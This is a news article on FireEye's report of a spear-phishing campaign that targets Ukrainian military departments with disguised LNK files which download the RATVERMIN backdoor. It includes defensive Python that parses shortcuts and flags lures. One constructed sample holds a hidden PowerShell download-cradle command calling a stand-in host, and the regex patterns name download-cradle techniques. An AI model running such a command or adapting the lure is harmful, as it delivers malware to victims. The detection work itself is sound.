Ukrainian military departments have been targeted by a spear phishing campaign as part of a cyber espionage operation in which the attackers attempt to drop a RATVERMIN backdoor.
Cybersecurity firm FireEye discovered the malicious campaign, which is still ongoing against the Ukrainian government. The campaign is reported to have started in 2018, and the hacking group behind the attack appears to be connected with the Luhansk People’s Republic (LPR).
FireEye’s report states:
In early 2019, FireEye Threat Intelligence identified a spear phishing email targeting government entities in Ukraine. The spear phishing email included a malicious LNK file with PowerShell script to download the second-stage payload from the command and control (C&C) server. The email was received by military departments in Ukraine and included lure content related to the sale of demining machines.
LPR is an independent state in the Donbass region of Ukraine that is only recognized by the Donetsk People’s Republic and South Ossetia. The state declared sovereignty in 2014, however, the Ukrainian government does not officially recognize LPR as independent and declares the region is part of Ukraine.
As part of the scam, malicious emails were sent to military personnel with the subject line “SPEC-20T-MK2-000-ISS-4.10-09-2018STANDARD”. These emails claimed to be from a UK defense manufacturer following up on a previous meeting.
The email also included an attachment that the recipient was encouraged to download. The attachment, named “Armtrac-Commercial.7z”, contained a zip file holding two Word documents and an LNK file that housed a malicious PowerShell script. The LNK file was disguised with a Microsoft Word icon so that it looked like a document. A copy of the email is below.
Malware attacks based on PowerShell commands have grown in popularity among cybercriminals in recent years. PowerShell is a versatile and flexible language that can integrate and interact with a multitude of technologies. It is attractive to attackers because it can run discreetly in the background and can gather system information without dropping an executable file on disk. PowerShell-based attacks were first seen in 2013 and picked up in 2016; 2017 was the first time a zip within a zip file was seen being used to disguise an LNK attachment.
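The lure described above relies on two properties of the LNK file that a defender can check without executing it: the shortcut's target and arguments point at a script host rather than a document viewer, and its icon is borrowed from an application it never launches. The following Python is an added example written for this article, not code from FireEye, Unit 42 or the campaign itself. It builds two constructed shortcuts in memory (one mimicking the lure, one a benign Word shortcut), parses the Shell Link header and StringData fields per the MS-SHLLINK layout, and applies simple heuristics (script-host target, hidden window, download cradle, encoded command, document icon on a script-host target). The sample paths, the `example.invalid` host and the regex patterns are assumptions chosen for illustration.

```python
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that control which optional sections follow the header.
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight


def build_sample_lnk(relative_path, arguments, icon_location, show_command=SW_SHOWMINNOACTIVE):
    """Constructed minimal shortcut: header plus three StringData fields, no IDList/LinkInfo."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIH2s4s4s", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, b"\0" * 2, b"\0" * 4, b"\0" * 4)

    def string_data(text):  # CountCharacters (uint16) followed by UTF-16LE characters, no terminator
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    # StringData order is fixed: NAME, RELATIVE_PATH, WORKING_DIR, ARGUMENTS, ICON_LOCATION
    return header + string_data(relative_path) + string_data(arguments) + string_data(icon_location)


def parse_lnk(data):
    """Return the StringData fields and ShowCommand of a shell link, validating sizes as it goes."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    offset = HEADER_SIZE
    if flags & HAS_ID_LIST:          # IDListSize (uint16) then the item ID list
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:        # LinkInfoSize (uint32) covers the whole LinkInfo block
        offset += struct.unpack_from("<I", data, offset)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_command}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, offset)[0]
        offset += 2
        nbytes = count * 2 if unicode else count
        raw = data[offset:offset + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {name} string")
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        offset += nbytes
    return fields


# Heuristics (assumptions for this example, not a vendor signature set).
SCRIPT_HOSTS = re.compile(r"(powershell|pwsh|cmd|wscript|cscript|mshta)(\.exe)?\b", re.I)
DOC_VIEWERS = re.compile(r"(winword|excel|powerpnt|acrord32|wordpad)\.exe", re.I)
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
                             r"|Start-BitsTransfer|Invoke-RestMethod", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
ENCODED = re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)


def assess(fields):
    """Return a list of findings explaining why a parsed shortcut looks like a lure."""
    findings = []
    launch = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    if SCRIPT_HOSTS.search(launch):
        findings.append("target is a script host")
    if HIDDEN_WINDOW.search(launch) or fields["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window hidden or minimised")
    if DOWNLOAD_CRADLE.search(launch):
        findings.append("download cradle in arguments")
    if ENCODED.search(launch):
        findings.append("encoded command")
    if SCRIPT_HOSTS.search(launch) and DOC_VIEWERS.search(fields.get("icon_location", "")):
        findings.append("document icon borrowed for a script-host target")
    return findings


# Constructed samples: a lure-style shortcut and a benign Word shortcut for contrast.
LURE_LNK = build_sample_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments=r"-NoProfile -WindowStyle Hidden -Command (New-Object Net.WebClient)"
              r".DownloadString('http://stage2.example.invalid/')",
    icon_location=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE")
BENIGN_LNK = build_sample_lnk(
    relative_path=r"..\..\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    arguments="",
    icon_location=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    show_command=1)

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        print(label, assess(parse_lnk(blob)))
```

The same `parse_lnk` / `assess` pair can be pointed at real `.lnk` members pulled out of an archive in a sandbox; the parser refuses anything that is not a shell link or whose string lengths run past the end of the file, which is how a malformed attachment would otherwise crash a triage script.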
FireEye has determined that the hacking group appears to have been active since 2014, and its attacks predominantly target the Ukrainian state.
The RATVERMIN .NET backdoor is a Remote Access Tool (RAT) discovered in 2018 by Palo Alto Networks’ Unit 42. The malware collects information from the victim’s computer using a keylogger and other means, then encrypts and stores the data. The backdoor can also delete files, update the malware, capture screenshots, and kill applications and processes.
In their closing statement, FireEye stated:
This actor has likely been active since at least 2014, and its continuous targeting of the Ukrainian Government suggests a cyber espionage motivation. This is supported by the ties to the so-called LPR’s security service. While more evidence is needed for definitive attribution, this activity showcases the accessibility of competent cyber espionage capabilities, even to sub-state actors.